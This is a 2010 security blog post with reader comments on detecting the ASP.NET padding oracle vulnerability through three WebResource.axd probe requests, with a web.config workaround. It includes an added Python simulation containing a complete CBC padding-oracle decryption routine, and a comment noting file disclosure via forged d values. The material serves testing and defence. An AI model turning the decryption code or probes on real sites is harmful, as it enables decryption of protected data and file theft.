Padding Oracle Test
Submitted by Bogdan Calin on September 22, 2010 5:04 pm
Everybody's talking about the ASP.NET Padding Oracle vulnerability released a few days ago at the ekoparty Security Conference. However, until now there wasn't enough information on how to check whether your application is vulnerable or not. Yesterday, Duncan Smart from the ASP.NET forums published some very useful information that allows us to do that.

An application exposes a padding oracle if it responds differently in the following three cases (what an attacker actually needs is to tell case 2 apart from the other two):

1. When a valid ciphertext is received (one that is properly padded and contains valid data).
2. When an invalid ciphertext is received (one that is not properly padded).
3. When a valid ciphertext is received (properly padded) but the decrypted value is not valid for the application.

If you want to know more about padding oracles, a very good resource is Automated Padding Oracle Attacks with PadBuster.

How do we apply this to ASP.NET? The key to attacking ASP.NET is the file WebResource.axd. This file is also used in the exploit video released by Juliano Rizzo. It can be used as a padding oracle because it responds differently in all three cases. Here are the three cases.

1. Valid ciphertext. Make a request like http://website.com/application/WebResource.axd?d=jzjghMVYzFihd9Uhe_arpA2 using a d value taken from a WebResource.axd link on a page the application itself served. The response status is 200 OK and the response body is the content of the web resource you've requested (some JavaScript code in my case).

2. Invalid ciphertext. Make a request like http://website.com/application/WebResource.axd?d=acunetix The response status is 500 Internal Server Error and the response body is some error message.

3. Valid ciphertext but invalid data. Make a request like http://website.com/application/WebResource.axd?d= The response status is 404 Not Found and the response body is some error message.
This is the padding oracle that allows an attacker to exploit this vulnerability: the status code alone (500 when the padding is bad, 404 or 200 when it is not) tells the attacker whether the ciphertext they submitted decrypted to valid padding. If your application responds differently in all of these three cases, it's vulnerable. Very important: setting customErrors to On or RemoteOnly (in web.config) doesn't solve this problem because the padding oracle is still there (the error message displayed on the 500 error page is not important for this vulnerability; the differing status code is). Therefore, apply the workaround presented by Scott Guthrie: edit web.config so that redirectMode is set to ResponseRewrite and defaultRedirect points to an error page defined by you.
<configuration>
  <system.web>
    <!-- element and attribute names are case-sensitive in web.config -->
    <customErrors mode="On" redirectMode="ResponseRewrite" defaultRedirect="~/error.aspx" />
  </system.web>
</configuration>
Once this workaround is applied, the application will return the same status code and response body in all three cases; re-run the three requests above to confirm it. If you are using .NET Framework version 3.5 SP1 or 4.0, it's even better.
If you are using .NET Framework version 3.5 SP1 or 4.0, the workaround provides further protection by also helping to mitigate against potential timing analysis attacks. The workaround uses the redirectMode=ResponseRewrite option in the customErrors feature, and introduces a random delay in the error page. These approaches work together to make it more difficult for an attacker to deduce the type of error that occurred on the server by measuring the time it took to receive the error.
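To make the three-case check, and the reason it matters, concrete, here is an added example that simulates the whole thing offline. It is not code from this post, from Acunetix or from Microsoft, and everything in it is constructed: the block cipher is a toy 4-round Feistel network built from SHA-256 (not secure, assumed only so the example runs without a real target), the key and IV are fixed constants, the `WebResourceHandler` class stands in for WebResource.axd and answers 200/500/404 exactly as the three cases above describe (or the same 200 error page for every failure when `hardened=True`, standing in for the ResponseRewrite workaround), and the `d` value is handled as raw bytes rather than ASP.NET's encoded form. `oracle_present` runs the post's three probes; `padding_oracle_decrypt` then shows why the distinction matters by recovering the plaintext of a valid `d` using nothing but whether each request came back as a 500.

```python
"""Offline simulation of the three-case test and the CBC padding-oracle decryption
it enables.  Added example, not code from the post, Acunetix or Microsoft.  The
block cipher is a toy 4-round Feistel network built from SHA-256 (NOT secure),
the key and IV are fixed constants, and d is handled as raw bytes."""
import hashlib
BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def enc_block(key: bytes, blk: bytes) -> bytes:
    left, right = blk[:8], blk[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, rnd, right))
    return left + right

def dec_block(key: bytes, blk: bytes) -> bytes:
    left, right = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, rnd, left)), left
    return left + right

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    n = BLOCK - len(plaintext) % BLOCK
    padded, out, prev = plaintext + bytes([n]) * n, b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = enc_block(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return iv + out  # the IV travels with the ciphertext

def cbc_decrypt(key: bytes, ct: bytes) -> bytes:
    if len(ct) < 2 * BLOCK or len(ct) % BLOCK:
        raise ValueError("malformed ciphertext")
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(_xor(dec_block(key, c), p) for p, c in zip(blocks, blocks[1:]))

class WebResourceHandler:
    """Stand-in for WebResource.axd; hardened=True plays the ResponseRewrite workaround."""
    RESOURCES = {b"Scripts/WebForms.js": b"// javascript resource body"}

    def __init__(self, key: bytes, hardened: bool = False):
        self.key, self.hardened, self.queries = key, hardened, 0

    def get(self, d: bytes) -> tuple:
        self.queries += 1
        rewritten = (200, b"error page") if self.hardened else None
        try:
            name = pkcs7_unpad(cbc_decrypt(self.key, d)) if d else b""
        except ValueError:                      # case 2: cannot decrypt / bad padding
            return rewritten or (500, b"Internal Server Error")
        if name not in self.RESOURCES:          # case 3: decrypts, but no such resource
            return rewritten or (404, b"Not Found")
        return 200, self.RESOURCES[name]        # case 1: valid ciphertext

def build_demo(hardened: bool = False):
    """Constructed target: fixed (fake) machine key and IV, one known resource."""
    key = hashlib.sha256(b"demo machineKey, not a real one").digest()[:16]
    token = cbc_encrypt(key, bytes(range(BLOCK)), b"Scripts/WebForms.js")
    return WebResourceHandler(key, hardened), token

def oracle_present(app: WebResourceHandler, valid_d: bytes) -> bool:
    """The post's probes: a valid d, garbage, and an empty d.  Three distinct answers = oracle."""
    return len({app.get(valid_d), app.get(b"acunetix"), app.get(b"")}) == 3

def padding_oracle_decrypt(app: WebResourceHandler, ct: bytes) -> bytes:
    """Recover ct's plaintext using nothing but 'was the status 500 or not'."""
    def pad_ok(d: bytes) -> bool:
        return app.get(d)[0] != 500
    if pad_ok(b"acunetix"):
        raise RuntimeError("no oracle: undecryptable input gets the same answer")
    plain, blocks = b"", [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)                # I = D(cur), recovered last byte first
        for pad in range(1, BLOCK + 1):
            pos = BLOCK - pad
            for guess in range(256):
                forged = bytearray(inter[k] ^ pad if k > pos else 0 for k in range(BLOCK))
                forged[pos] = guess
                if not pad_ok(bytes(forged) + cur):
                    continue
                if pad == 1:                    # rule out an accidental 02 02 / 03 03 03 hit
                    forged[pos - 1] ^= 0xFF
                    if not pad_ok(bytes(forged) + cur):
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                raise RuntimeError("no padding match at byte %d" % pos)
        plain += _xor(bytes(inter), prev)       # P_i = D(C_i) xor C_{i-1}
    return pkcs7_unpad(plain)
```

Against the hardened handler `oracle_present` returns False and `padding_oracle_decrypt` refuses to start, because garbage and a valid value now get the same answer; that is the state the workaround above is meant to produce. The simulation does not model the timing side channel mentioned above: an oracle can survive status-code normalisation if the failing path takes measurably longer, which is why the random delay in the 3.5 SP1 / 4.0 workaround matters.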
Today we've released an update for Acunetix WVS that automatically checks whether your application is vulnerable to this ASP.NET vulnerability.
9 Comments
Calandale says:
September 22, 2010 at 11:10 pm
The Microsoft advisory implies that this vulnerability can be exploited to ends other than merely decrypting application information. In particular, disclosure of files on the system itself. Has anyone investigated this claim? If this is indeed exploitable, this is a situation which is far more worrisome than the exploit which was demonstrated. Too, this tool doesn't reflect the observation that Thai Duong made which is that the actual response codes are unnecessary, timing attacks can give the same information.
Acunetix WVS Version 7 build 20100921 released | Acunetix Web Application Security Blog says:
September 22, 2010 at 11:29 pm
[...] bug fixes, this build will also automatically check for the latest OpenX OFC file upload and the ASP.NET padding Oracle [...]
TheTestManager says:
September 22, 2010 at 11:39 pm
Are you aware if by using ResponseRewrite and defaultRedirect it is still possible to carry out Oracle Padding using the response status codes instead of the response body? This way attackers could still look for status response codes 302 which would happen on the non-valid ciphertext as you get redirected to the new custom error. which would then give a 200? Or does the setting of responserewrite and defaultredirect get around that possible attack scenario?
@Calandale Yes, from my understanding it's possible to read the contents of any file from the application directory. The WebResource.axd file can be used to do exactly that. You have to prepare the right value for the d parameter (this parameter specifies what resource/file you want to read). You can do that after you've recovered the encryption key. The workaround that uses the redirectMode=ResponseRewrite option in the customErrors feature introduces a random delay in the error page. Therefore, timing attacks don't work anymore.
@TheTestManager From my tests, after you've configured ResponseRewrite and defaultRedirect there are no redirects (301/302) to the custom error page. I just see a 200 status code. Our tool (HTTP Editor) doesn't automatically follow redirects.
Vulnerabilidad Padding Oracle en ASP.NET WillyXoft says:
September 23, 2010 at 10:53 am
[...] How to check if your application is vulnerable to the ASP.NET Padding Oracle Vulnerability [...]
Week 38 in Review 2010 | Infosec Events says:
September 27, 2010 at 7:42 pm
[...] How to check if your application is vulnerable to the ASP.NET Padding Oracle Vulnerability acunetix.com [...]
Soroush says:
September 27, 2010 at 11:33 pm
In Case 3, valid ciphertext but invalid data (When a valid ciphertext is received (properly padded) but the decrypted value is not valid for the application.), is it the same to change only 1 letter of a valid cipher to an invalid one? For example, can we use this one: http://website.com/application/WebResource.axd?d=jzjghMVYzFihd9Uhe_arpA1 when the valid one is: http://website.com/application/WebResource.axd?d=jzjghMVYzFihd9Uhe_arpA2 (I've changed jzjghMVYzFihd9Uhe_arpA2 to jzjghMVYzFihd9Uhe_arpA1)? Thanks
ASP.NET Padding Oracle | The Chronicles of Jon says:
October 7, 2010 at 5:20 am
[...] How to check if your application is vulnerable to the ASP.NET Padding Oracle Vulnerability [...]